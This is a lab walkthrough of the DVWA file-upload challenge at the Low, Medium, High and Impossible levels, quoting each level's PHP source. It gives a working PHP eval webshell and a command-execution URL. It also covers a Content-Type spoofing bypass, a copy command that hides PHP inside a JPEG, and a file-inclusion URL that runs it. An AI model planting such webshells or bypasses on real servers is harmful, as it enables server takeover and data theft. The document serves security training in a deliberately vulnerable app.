Low level:
First, let's look at the source code:
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>
This is the initial page:
We try uploading an image from the desktop:
It tells us the upload succeeded:
Now let's take a look at this path:
../../hackable/uploads/1.jpg succesfully uploaded!
This is an absolute path, so we enter the URL directly:
http://127.0.0.1/DVWA/hackable/uploads/1.jpg
Next we try uploading the file 1.php from the desktop,
whose content is <?php phpinfo();?>
We find that the upload succeeds; the server applies no filtering or restriction at all:

We visit the uploaded path again: http://127.0.0.1/DVWA/hackable/uploads/1.php
This shows that a file upload vulnerability exists: PHP files can be uploaded and executed.
At this point, if we upload a one-line webshell (一句話木馬):
<?php @eval($_GET['joker']);?>
and connect to it with China Chopper (中國菜刀), we obtain a webshell on the server and gain initial control of it.
First we upload it:
After the upload succeeds, we visit it:

The page shows no error, so the upload succeeded.
1. Now we enter the URL:
http://127.0.0.1/DVWA/hackable/uploads/2.php?joker=system('type D:\\PHP\\wamp\\www\\DVWA\\php.ini');
We find the command executes successfully; with this we can view every folder on the server.
2. Alternatively, open China Chopper and enter the path: http://127.0.0.1/DVWA/hackable/uploads/2.php
Choose connect:
This way we can likewise access any folder on the server. Clearly, file upload vulnerabilities are extremely dangerous.
Medium level:
First look at the source code:
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
Look at this code:
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 )
These two conditions check the uploaded file's type and size, so 1.php will presumably be blocked.
Based on our experience at the Low level, we try uploading 1.php:
Sure enough, the PHP file is filtered; the error message says only jpg and png files are accepted.
Now we can capture the requests with Burp Suite and compare how the successful and failed uploads differ:
First we upload the normal 1.jpg; the request captured by Burp Suite is:
Then we upload 1.php and capture the failed upload request with Burp Suite:
Comparing the two, only the upload Content-Type differs, so we capture the request and change the upload type:

What follows is the same routine as the Low level, not repeated here.
High level:
The source code is as follows:
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
In other words, the Low and Medium level methods no longer work.
Now we wonder whether PHP can be disguised as a jpg to get past this check, that is, by making a one-line image webshell.
- Use CMD to make the one-line image webshell.
- The /b parameter copies and merges files in binary mode; used for image and audio files.
- The /a parameter copies and merges files in ASCII mode; used for text documents such as txt.
- copy 1.jpg/b+1.php 2.jpg
- // This means merging 1.jpg, in binary mode, with 1.php into 2.jpg
- 2.jpg is then the image webshell.
The image webshell is ready:
Opening it in Notepad++ we can see this line:

Then we can upload it:
Now we can use DVWA's file inclusion vulnerability (the fi module) and enter the URL:
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D:\PHP\wamp\www\DVWA\hackable\uploads\2.jpg
This lets us reach the PHP code embedded in the image webshell.
The rest is the same old routine, not repeated here.
Impossible level:
First let's look at the code:
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
We try uploading an image, 1.jpg:
The uploaded filename has been regenerated by the server, so as expected our image webshell no longer works.
